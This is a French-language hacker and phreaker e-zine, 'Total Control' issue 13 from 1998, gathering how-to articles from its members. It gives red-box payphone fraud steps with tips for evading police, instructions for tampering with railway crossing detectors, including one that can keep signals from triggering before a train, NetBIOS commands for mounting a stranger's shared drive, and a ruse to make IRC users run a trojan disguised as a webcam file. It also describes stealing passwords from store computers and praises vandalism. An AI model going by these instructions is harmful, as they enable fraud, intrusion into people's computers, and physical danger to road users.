Copy Link
Add to Bookmark
Report
Total Control 13
*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8
___________________________________________
| | WE CONTROL YOU AND THERE'S
| .x |
| ....nnnH> :MM" | NOTHING YOU CAN DO ABOUT IT
| 'HHMMMMMMMMMM> :MMf |
| ""`` MMX xMM" |
| MMM XMM" | /$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\
| 'MMM> :MMf | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| 'MMM> MMM | $$$$$ $$$$$
| 'MMMX :MMX | $$$$$ Total Control is : $$$$$
| XMMMX XMMX | $$$$$ $$$$$
| XMMMM XMMX | $$$$$ * Err418 $$$$$
| XMMMM> 'MMM | $$$$$ $$$$$
| MMMMML ?MMX | $$$$$ * MindUser $$$$$
| MMMMMX *MMX | $$$$$ $$$$$
| MMMMMM #MMM. | $$$$$ * Cluster $$$$$
| MMMMMM `*MMh: | $$$$$ $$$$$
| 'MMMMMM> `"*MMhx. | $$$$$ $$$$$
| '*****M! `"*M | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| TOTAL CONTROL | \$$$$$$$$$$$$$$$$$$$$$$$$$$$$$/
| |
| * M A G A Z I N E * |
|_________________________________________|
*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8
*----------------------------------------------------------------------------*
Ý Ý
Ý Total Control, Numro 13, Mai 1998 Ý
Ý Ý
Ý http://totalcontrol.home.ml.org Ý
Ý Ý
*----------------------------------------------------------------------------*
Ý Groupes affilis : BELL - QUEBECTEL - TELEBEC - NORTEL - GRC - FBI - CIA Ý
*----------------------------------------------------------------------------*
/------------------\
| AVERTISSEMENT |
\------------------/
Ce document contient des informations illgales si vous les utilisez mais
puisque, ici, elles ne sont distribues que pour des fins ducatives,
elles peuvent tre considres tant lgales (vous me suivez ?). Le personnel
de Total Control ne vous encourage pas
utiliser ces techniques.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
0=--------------=0
| Introduction |
0=--------------=0
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bonjour
vous tous lecteur de TC magazine. J'espre que vous allez
bien... moi je me porte
merveille. Nous avons introduit un nouveau membre
dans le staff de Total Control et il s'agit de Cluster. D'ailleurs, le ASCII
d'ouverture de ce numro est de lui. Cluster est, comme les autres membres de
TC, amoureux de la tlphonie et des Millenniums. Alors, Cluster, nous te
souhaitons la bienvenue dans notre quipe et j'espre que tu t'y impliqueras
avec beaucoup de plaisir :-)
En passant, si vous souhaitez nous parler sur IRC, vous pouvez nous
trouver sur le channel #tctrl sur EFNET.
Ok, now, voici un petite publicit que j'ai promise au groupe de h/p
de la rgion de Qubec : Corruption Addicts. Ce groupe est trs actif sur la
scne de la ville de Qubec et contient des ex-membres de NPC alors n'hsitez
pas
les rencontrez sur #c-a (efnet) et sur leur site que vous pouvez voir
l'URL suivante : www.asphyxiie.org/corruption ! Je vous le dis, les releases
sont vraiment de qualit et le site est magnifique (chapeau nmare !). De plus,
le fondateur de C-A, Phaust, m'a dit que s'il dcide de se bouger un jour, il
crirait un article pour Total Control... esprons qu'il se dcide... :-)
******* BREAKING NEWS *******
Le groupe C-A est mort... et oui... Phaust et Nmare ont reu la visite de la
GRC
leur appartement et se sont fait confisquer leur matos informatique...
Je tiens
dire que le BUST est survenu aprs que le groupe se dissoude donc
ne pensez pas que la GRC a russi
tuer un des meilleurs groupes du Quebec.
Il s'agit d'une dcision commune de tout les membres de C-A.
Dernire chandelle
C-A et bonne chance
Nmare et
Phaust !
******* BREAKING NEWS *******
Si vous dsirez contribuer
TC magazine, envoyez vos articles
:
err418@technologist.com et il me fera un plaisir de les mettre dans un
prochain numro. Bonne lecture !
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
---------------------------------------------------------------------
Date: Fri, 17 Apr 1998 22:38:09 -0400
From: Fatal Speed <karnage@webworqs.com>
To: err418@technologist.com
Subject: yahoo
Salut mon toi!
Heye super, Total Control!!!
Ca fait 3-4 mois que j'me bidonne en lisant PLA (l'original, the only
one), pis assteure je peut le faire en francais... wouhou!!!!
Continue a sortir des issue, on apprecie!
A plusse.. hehe
Fatal Speed
-------------------
Rponse
TC: hehehe merci d'aimer notre travail... continue de lire TC !
---------------------------------------------------------------------
From: drunky_99@hotmail.com
To: err418@technologist.com
Subject: un fan de ton zine
Date: Thu, 16 Apr 1998 10:34:17 PDT
Salut, moi c Drunky!
Je viens de dcouvrir ton zine (20 avril 1998).Il tait temps que
quelqu`un parle de phreaker sur le scne du Qubec. Pour ma part je suis
plutot sur la scne du cracking (trs nouveau, mais j'ai des bons progs).
D`ailleurs en naviguant sur le net, j`ai tomb sur le prog Revelation!
C'est un prog qui dvoile les passwords qui sont sous astriques avec
Win95.
Tu installes le prog sur une disquette pis tu fais le tour des magasins
qui ont internet en dmonstration. Tu t'assures qu'il n'y a personne autour
de toi (vident). Tu run le prog pis voil
! En passant je ne suis pas
responsable de vos activits illgales,
vos risques et prilles!
Vous direz surement "Ou trouver ce programme ?" Facile www.snadboy.com
En embarquant sur la page vous aller dans le link Revelation.
Avant de downloader le prog je vous conseille d'aller voir les "screen
shot" pour mieux comprendre comment marche le programme.
Goodbye and nice cracking!
From your alcoholic friend Drunky...
-------------------
Rponse
TC: Salut Drunky, ouais c super cool ce prog l
... Ca fait un bout que
ici on l'utilise... j'te dis que j'en ai ramasser des accounts PPP de
QuebecTel avec le truc des magasins... Le pire c'est que ca me sert
rien moi alors je les donnes
un accros que je connais (acxel ;-)
---------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Dcouvrez qui se cache derrire une adresse spoofe
Par Merlin2 (digital2@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bon, tant donn que de plus en plus de monde ont des adresses spoofes
lorsqu'il vous nuke ou autre, voici un moyen de trouver leur IP. Voici les
instructions
suivre que j'ai trouver sur le site de Anti-online (vous
trouvez plusieurs bons programmes pour vous protegez ou attaquer):
#1. Votre moniteur vous avertit que quelqu'un vous nuke, et vous voulez
voir l'ip de quelqu'un que vous pensez que c'est. vous faite /whois JP
(JP est le nick). Vous trouvez que JP est JP@this.is.a.spoofed.ad
#2. Vous faites un /dns this.is.a.spoofed.ad. Nous dcouvrons alors que le
hostmask ne se rsout pas. Cela nous permet de savoir que JP est
probablement entrain de faire du spoofing.
#3. Aucun problme. Nous n'avons qu'
taper une simple petite commande de
serveur IRC, Soit: /quote userip JP. Qui nous donne:
JP=+JP@130.49.71.21
Nous avons maintenant son vrai IP.
#4. Maintenant, une fois encore nous tapons /dns 130.49.71.21. Ce qui
donne son addresse DNS qui est quelque chose comme :
jpvst7.j.resnet.pitt.com
#5. Cela peut maintenant aisment vous aidez
confirmer vos doute, et
mme le nuker vous aussi.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Des photos de Millennium
Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Voici des photos des diffrents types de Millennium. Les fichiers sont joints
avec TC #13 et sont disponibles dans la section FILEZ du site web.
Fichier Grosseur Contenu
======= ======== =======
img001.jpg 22k Tlphone Millennium de table
img002.jpg 24k Tlphone Millennium
cartes
img003.jpg 24k Tlphone Millennium
paiement universel
Rincez-vous l'oeil :-)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Red Boxing au Qubec : Mythe ou ralit ?
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le red boxing est un vrai flau aux USA et il connait aussi quelques
balbutiments au CaCanada :-) Cependant, dans notre belle province, qu'en ai-t'il?
Dans cet article, vous dcouvrirez l'univers du Red boxing de fond en comble.
Voici les diffrentes parties qui composeront mon texte :
1) Qu'est-ce que le Red Boxing ?
2) Comment a-t-il t dcouvert ?
3) Comment faire sa Red Box ?
4) Sur quel tlphone public a marche ?
5) Est-ce risqu ?
1) Qu'est-ce que le Red Boxing ?
================================
Avant de vous expliquer qu'est-ce qu'une Red Box, vous devez savoir
comment fonctionne le paiement, la vrification et l'authorisation lorsque
vous placez un appel.
* Note: Le terme "tlphone" dans cet article rfre aux tlphones publics
de type NON-millennium soit les Centurions qui sont habituellement
noirs ou bruns.
Quand vous voulez appeller
un numro
partir d'un Centurion, la
compagnie de tlphone doit savoir combien d'argent vous mettez dans le "coin
slot". Pour un appel local, la vrification attends que vous ayez mis un
25 cents et alors vous permet de placer votre appel. S'il s'agit d'un appel
interurbain, la TeLcO attends que vous dposiez le montant ncessaire avant de
vous laissez placer l'appel. Pour effectuer toutes ces tapes de vrification
et d'authorisation, le tlphone et la centrale doivent communiquer entre eux
et ils le font avec l'aide de tonalit (N-ACTS). C'est-
-dire que lorsque
vous insrez, par exemple, 25 cents dans la coin slot, le tlphone mets
sur la ligne une tonalit prcise. Pour une pice de 10 cents, le tlphone
mets une tonalit mais d'une autre frquence. Il existe une tonalit
diffrente pour chaque pice de monnaie supporte par le Centurion.
Le principe de la Red Box est fort simple quand vous connaissez
comment le tlphone et la centrale communique ensemble. Il suffit d'mettre
les tonalits vous-mmes au que ce soit le tlphone qui les mette. Vous me
direz srement : MAIS COMMENT CELA EST POSSIBLE ? Ceci est possible puisque
le tlphone et la centrale communique sur la mme ligne tlphonique qui
vous sert
placer vos appels DONC qui est reli au combin du tlphone.
Et oui ! C'est aussi simple que a, il suffit d'mettre les tonalits
mme
l'endroit ou vous parlez... avec le combin. En rsum, c'est ainsi que le
Red Boxing fonctionne : on met des "fausses" tonalits pour tromper la
centrale et lui faire croire que l'argent
t introduit dans le tlphone.
2) Comment a-t-il t dcouvert ?
=================================
Grce
un article dans un journal d'ingnieur d'AT&T qui diffusait
les frquences des tonalits correspondantes aux pices de monnaies (ACTS),
des tudiants du MIT (Minnesota Institute of Technology) en ingnirie ont
fait quelques tests et se sont rendus compte que l'mission de "fausses"
tonalits tait possible. Ils publirent une srie d'articles sur leur
trouvaille dans des journaux universitaires et c'est ainsi que cette technique
tomba entre les mains de ceux qui savent comment l'exploiter : les phreaks.
3) Comment faire sa Red Box ?
=============================
Si ce texte est le premier sur le Red Boxing que vous lisez, vous
devez tre tout excits et vous devez crier comme des dfoncs devant votre
cran : "Mais merde, c'est ben trop hot tout a.... COMMENT JE M'EN FAIS UNE?
Envoye crache le mottons que je m'y mette tout de suite !!!!" Et bien voici
ce que vous attendez...
Il existe deux techniques pour se faire sa propre Red Box. Celle
de l'enregistrement et celle du "dialer radio shack". Personnellement, je
trouve la technique de l'enregistreuse plus facile
faire et celle du
"dialer" un peu trop technique. C'est pour a que je n'expliquerai pas comment
faire une Red Box avec la technique "dialer" mais en gros il s'agit de prendre
un "dialer" (en vente chez Radio Shack) et de modifier le diamants pour que
les frquences misses ne soient plus celles du compositeur (1234567890*#)
mais celles que l'on a de besoin pour la Red Box. Je ne sais mme pas quelles
doivent tre les caractristiques du diamant pour pouvoir mettre les
tonalits frauduleuses...
Donc, voici la technique de l'enregistreuse. Vous avez besoin d'un
objet capable d'enregistrer des sons et des tonalits ncessaires. Faites
attention puisque les tonalits canadiennes (N-ACTS) diffrent des celles
utilises aux USA (ACTS). Vous utilisez l'objet d'enregistrement pour mettre
les tonalits sur son support d'enregistrement et aprs vous allez les faire
jouer avec cet objet devant la partie utilise pour parler du combin.
Attention : la qualit du son des tonalits doit tre BONNE.
Vous me demanderez srement : Mais ou prendre les tonalits
valides pour le Canada ? Et bien, sur le site de ToTal Control dans la
section FILEZ et elles seront aussi jointes
ce numro de TC (ca-tones.zip).
Un dernier conseil : utilisez si possible un petit gadget
d'enregistrement numrique rapide pour enregistrer les tonalits parce que
a fait un peur suspect de mettre une enregistreuse en avant d'un combin ou
encore pire, un Gatto Blaster. hehehehe. (Petite parenthse, savez-vous quelle
est la traduction franaise de Gatto Blaster ? C'est un TONNITRUANT. C'tait
une question dans un de mes examens de franais
un moment donn... SHIT
Merde, je dlire... excusez-moi :-)
4) Sur quel tlphone public a marche ?
========================================
Sur TOUS les tlphones publics non-digitals. Donc, excluez les
Millennium : NON le Millennium ne communique pas avec la TelCo pour effectuer
une vrification de montant.. il vrifie LUI-MÒME le tout et il authorise
LUI-MÒME l'appel. Aucune communication avec la centrale lorsqu'un appel est
plac.
QUELS SONT VULNRABLES ? RPONSE : Les Centurions
5) Est-ce risqu ?
==================
Bien sr, le Red Boxing est un acte criminel de fraude tlphonique
et est sanctionn par le Code Criminel, donc il reprsente un risque.
Cependant, ce risque reste assez faible puisqu'au Qubec les TelCos
n'ont pas a faire face
un flau et ne sont pas consciente que ce phnomne
peut leur causer du tort donc ne surveille pas activement ce genre de fraude.
Voici quelques conseils de sret que vous devez respect pour Red
Boxer avec plus de sret :
- Si une de vos tentatives de Red Boxing chout, changez de tlphone ou
cessez vos activites de Red Boxing pour la journe.
- Ne pas Red Boxer pour placer un appel local.
- Uilisez un petit gadget d'enregistrement digital rapide pour vos tonalits.
Ceci vous permettra d'appuyer sur le bouton RECORD si vous voyez les policiers
arrivs donc d'effacer toutes les preuves de votre actes :-)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Comment niaiser des truckers avec une track de chemin de fer
Par Crow Killer (diane.chasse@sympatico.ca)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Prface
=======
Toutes les voies ferres ,au Canada, sont quipes de "dtecteurs" qui, acti-
vs par un train, allument les lumires et les cloches prs des routes, right?
Imaginez que l'ont puisse les contrler a volont... (pour les pas vite, re-
gardez le titre).
Principe de fonctionnement
==========================
Pour comprendre, rien de mieux qu'une image:
(CN001.gif)
No 1: Poteaux lumineux (varient en hauteur et grosseur, selon l'endroit)
No 2: Poste central (trs grosse bote grise)
No 3: Poste de dtecteur (trs loin de la route, + petit que le poste central)
No 4: Dtecteur (sorte de plaque de bois fixe a la track)
Quand un train passe sur les dtecteurs, il active une sorte de relais dans le
poste de dtecteur qui renvoit une impulsion lectrique au poste central qui
dirige le courant du poteau lectrique vers les lumires.
En gros, c'est de mme que sa marche.
Les dtails
===========
Le poste central est reli a une ligne de courant semblable a celle de
n'importe quel bulding. Soud sur le botier, il y aune sorte de COCOT grise
(avec une PETITE porte) qui contient une grosse switche et un carnet semblable
a celui plus bas qui allume les lumires et la cloche."On peut pas l'ouvrir: y
a un cadenas!" Mais cette sorte de cadenas (comme tous ceux du CN) s'ouvre avec
un box de ratchet 1/2. On s'en sert comme une cl pour dvisser la bolt a
l'intrieur. Tout ce qu'on a a faire c'est d'actionner la switche quand un
truck (ou mieux, un tanker) est
100 pieds ou moins de la traverse de chemin
de fer. Seul inconvnient: on est bien trop proche de la route pour le faire
sans se faire voir. On en vient donc au poste de dtecteurs.
Les postes de dtecteurs contiennent:
(CN002.gif)
No 1: Batteries (transparentes)
No 2: Carnet ou fiche des "bilans des inspections" (tat des piles, etc)
No 3: Indique
quel poids le dtecteur se dclenchera...
No 4: je le sais pas. (aprs tout, je n'ai que 13 ans!)
No 5: Fil venant du dtecteur et fil partant au poste central
Tuyau marqu PVC: par ou passent les 2 fils relis au poste central
Ligne bleue: bypass (voir plus bas)
Il s'ouvre de la mme faon que l'autre mais l
, pour faire ce qu'on veut,
c'est plus compliqu. On va avoir besoin d'un fil pour faire un petits bypass
entre la bolt la plus en haut
droite des deux "cossins inconnus" (No 4) et
le fil reliant la bolt en bas
gauche, vers le 2e fil. (demandez moi pas
pourquoi sa marche, je le sais pas: j'ai butch et sa a march). *Petite remar-
que: il y a un dlai de 5
10 secondes pour que le signal ai atteint le poste
central et dclenche tout le patatra. Vous avez donc en masse de temps pour
vous cacher.
ATTENTION! Examinez bien le petit carnet: il indique les dates des inspections
(en moyenne1 fois/semaine). Sa serait tu plate si tu te ferais buster...
Conclusion
==========
Voici quelques petites ides amusantes (expriences personnelles):
-Dclencher la cloche
3 heure du matin
- Mettre la rsistance du poste des dtecteurs au plus haut a une heure pas-
sante (sa peut tre pas mal dangereux, car si le train n'est pas assez pesant,
il ne dclenchera pas le relais du poste central...)
- Un de mes amis c'est achet un relais tlcommand de porte de garage (le
riche!) et aprs l'avoir install sur une des batteries, il pouvait dclencher
le systme a distance!
(Note de Err418 : Comme tout bon diteur et prsident d'un zine de H/P/C, je
me dois de tester les techniques prsentes dans le zine que j'dites. Alors,
moi et Funky, on est all tester ce petit truc et j'Ai t rellement du
puisqu'il n'a pas fonctionn. CEPENDANT, l'auteur de cet article m'assure que
son article est vrai DONC je le crois... c'est tout... test it by yourself.)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Mes aventures avec les machines
Coke
Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
En premier je voulais essayer de crosser un Millennium; J'avais perc un 25
cents et attacher une corde
pche aprs, mais disons que a n'a pas eu
l'effet attendu (faire des appels gratos) plutt le 25 cents
redescendu dans
le "retour des pices". Deu du rsultat je me suis tourner vers une machine
Coke, aprs 15 minutes de gossage j'ai russi
lui soutirer quelques 25
cents. Mais j'ai aussi remarque la grande instabilit de ces machines la:
aprs avoir mit 1$ (la liqueur coutait 1,25$) je pse sur retour de change et
Hop! elle me redonne: 1$ et 4 x 25 cents. Bizarre!
Contrairement au Millennium les machines
liqueur on 2 compartiments:
Le premier pour accumuler ton cash
Le deuxime qui contient du change classer genre en 1$, 25 cents, ...
Donc si quelqu'un ne reoit pas son change y'a de forte chance que si la
prochaine personne met moins que le cot d'une liqueur (si t'en met plus ou
gal tu dois absolument en prendre une) et elle pse sur retour de monnaie ben
elle va surement pogner le change de la personne qui ne l'a pas reu. Amusant.
Si vous avez d'autres techniques pour crosser les Millenniums ou les Machines
Coke e-mailer vos dcouvertes
:
cluster@comports.com ou err418@technologist.com
------------------------------------------------------------------------------
En passant je voudrais fliciter un de nos supporters pour avoir dcrisser le
lecteur de carte magntique d'une Millennium
l'aide d'une barre de fer. Le
pauvre a afficher le message "Pices de monnaie seulement" pendant 3 jours.
hahAHaHhe
------------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Comment pntrer un dique dur
Par La PaNtHRe Du WeB (LaPaNtHeRe@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bonjour, voici deux techniques qui vont vous permettre de prendre le controle
d'un disk dur. La premire technique, pour l'utiliser vous devez avoir NETBIOS
et votre victime doit avoir Windows 95 ou Windows NT. La deuxime technique
est beaucoup plus simple... mais vous devez convaicre votre victime d'accepter
votre fichier pour ensuite vous connecter sur le port 666 avec Ws_ftp (plus
de dtail plus bas...)
1) Premire technique avec NETBIOS
==================================
LE PRINCIPE :
Depuis que NT 3.51 existe, Microsoft a implement des commandes permettant de
communiquer avec d'autres PC, tout ca juste avec un driver pour votre carte
rseau, le protocole NETBEUI d'install, et le tout en ligne de commande, ce
qui permettait de raliser des installations
distance par exemple. C'est
d'ailleurs encore beaucoup utilis, une simple disquette de boot, et paf, vous
pouvez installer plein de postes. Ce protocole NETBEUI, reposant sur NETBIOS,
vous permet entre autres de partager des ressources sur le rseau,
condition
d'avoir install le client "Client pour le rseaux Microsoft", et d'avoir
activ l'option "Permettre
d'autres utilisateurs d'utiliser mes fichiers".
Dans ce cas, vous pourrez alors voir ce qui est partag dans le fameux
Voisinage rseau de Partageur 95 ou de NT 4. Certains d'entre vous sont en
train de lire ceci, se dise : "Arfff le con, il sait mme pas que Internet a
repose sur les protocoles TCP/IP et pas NETBEUI". Et l
, je vous rponds :
"Je sais mon enfant, mais il existe une passerelle !!". "Une passerelle ?
Entre NETBEUI et TCP/IP ?? Je le crois pas ? C'est pas possible ???" me
rpondrez vous !! Et pourtant si !! Microsoft ne pouvait pas se permettre
d'interdire ce type de passerelle, car tous les rseaux Internet utilisent
TCP/IP, et il fallait un moyen de convertir les noms de machines sous NETBEUI
en adresse IP. C'est ce que fait le fichier LMHOST dans votre rpertoire
WINDOWS. Logiquement, si vous regardez maintenant, il n'existe pas, mais en
revanche vous devez avoir un LMHOSTS.SAM qui trane, qui est un fichier
d'exemple. Allez donc y jeter un coup d'oeil...
Donc vous avez compris, avec LMHOST, on peut donc aller voir les ressources
partages de quelqu'un,
partir du moment qu'on connait son IP, le nom de sa
machine et ses ressources partages. Et il faut aussi qu'il ait des ressources
partages videmment, mais a faut pas tre polytechnicien pour le comprendre.
Vu comme a, a fait beaucoup de chose
savoir.. mais pas tant que a en fin
de compte, car Bill qui est bon pour nous, nous a donn plein de belles
fonctions qui vont nous aider
combler les trous.
Premire chose, pogner l'IP. L
, rien de plus facile, vous reprez l'IP ou
l'adresse du gars sur IRC par exemple. Si c'est l'IP numrique du type
123.123.123.123, pas de problme, si c'est un truc du genre
marcel@routeur.domaine.com, vous faites: PING -a routeur.domaine.com et vous
aurez son IP. Voil
une bonne chose de faite. Maintenant, a serait sympa de
savoir le nom d'ordinateur de la personne dont vous voulez voir le disque dur.
Pour cela, Bill nous offre la fonction NBTSTAT qui permet de voir l'tat d'un
adapteur rseau, et les infos le concernant.
Tapez donc :
NBTSTAT -A 127.127.127.127 <- L'adresse IP de la cible hein , pas celle ci...
Ah oui, le -A signifie que c'est une adresse IP numrique que l'on donne.
N'OUBLIER PAS, A MAJUSCULE)
Si la cible a NETBEUI d'install, vous devriez obtenir un truc du style :
C:\>NBTSTAT -A 194.114.95.141
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MAURO <00> UNIQUE Registered
MICA <00> GROUP Registered
MAURO <03> UNIQUE Registered
MAURO <20> UNIQUE Registered
MICA <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
(SI C'EST CRIT "HOST NOT FOUND", C'EST QUE VOUS DEVEZ CHANGER DE CIBLE...)
Ce qui vous intresse c'est les noms avec crit UNIQUE
ct. Votre cible
utilise forcment l'un de ces noms de machines en ce moment mme !! Et c'est
l
qu'intervient LMHOSTS.
Vous ditez LMHOSTS avec EDIT par exemple, et vous tapez dans ce fichier :
194.114.95.141 MAURO #PRE
Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que cette
correspondance entre l'IP et le nom de machine doit tre prcharg, pour ainsi
passer AVANT la rsolution DNS.
Ensuite, on va rinitialiser notre fichier LMHOSTS que vous venez juste de
sauvegarder, n'est ce pas ? Pour cela, vous tapez :
C:\>NBTSTAT -R
Et si tout se passe bien, vous obtenez :
"Successful purge and preload of the NBT Remote Cache Name Table."
Maintenant, nous allons nous occuper de chercher les ressources partages par
notre copain.
Pour voir les ressources, vous allez taper NET VIEW, VIEW comme "voir" en
anglais, remarquez comme les choses sont bien faites. D'ailleurs cette
commande NET est extrmement puissante, faites donc un NET /? Pour vous en
convaincre !! Donc, a doit donner un truc comme :
NET VIEW \\MAURO (MAURO car l
nous passons sur le protocole NETBEUI,
LMHOSTS va se charger de convertir le nom de machine en IP)
Et hop, dans mon exemple, a donne a :
(C'EST LA QUE MOI J'AI QUELQUES PROBLÒMES, JE NE RUSSI PAS A PASSER CETTE
TAPE...)
C:\>NET VIEW \\MAURO
Ressources partages
\\MAURO
Nom de partage Type Commentaire
---------------------------------------------------
C Disque
D Disque
E Disque
HP4L Impr.
G Disque
I Disque
Excution acheve.
Je sais donc que tous ces lecteurs sont partags. Parfait, on va donc aller
faire un tour sur le C: .
La commande NET arrive ma rescousse :
C:\>NET USE \\MAURO\C
K: Connect
\\MAURO\C
Et voil
, le disque C de la cible est devenu mon disque K: Super non ? Vous
pouvez alors tout visiter et foutre le bordel.
2) Deuxime technique avec le port 666
======================================
Cette technique est trs simple... il vous suffit d'envoyer le fichier
envoi.zip que vous trouverez sur le site. Il faut que votre victime accepte
votre fichier, le dezip et l'ouvre. Ensuite vous ouvrez votre WS_FTP
et vous vous connecter sur le port 666 et vous vous trouverez dans le hard
disk de la victime.... :o)
(Note : Seulement possible avec WS-FTP)
- Comment envoyer le fichier a votre victime?
C'est simple... vous aller sur IRC, vous vous donnez un nick de fille
(ex.: Julie20), vous vous trouvez votre victime et vous dite que vous avez
une camra et que si il veut vous voir il ne suffit d'accepter votre fichier
et de l'ouvrir et il vous verra en direct.. ils refusent rarement. Si il vous
dit qu'il a peur que se soit un virus, demandez-y si il a un anti-virus et
il vous rpondra surement oui... alors vous lui rpondez de quoi tu as peur?
Vous insistez pas trop sinon il va se douter de quelque chose... et voila,
c'est trs simple....
Vous pouvez aussi envoyer le fichier envoi.zip dans un ftp et attendre que la
victime l'ouvre et vous allez pouvoir prendre tous les fichier du ftp, et meme
de tout son hard disk... :-)
(Conseil de Err418 : Ce qui va le mieux c'est de renommer le fichier
webcam.exe et de le zipper sous webcam.zip et de le sender
sa victime :-)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Un super de bon exploit pour ALLLLLLLLLLLLLLLLL LINuX !! yeah !
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
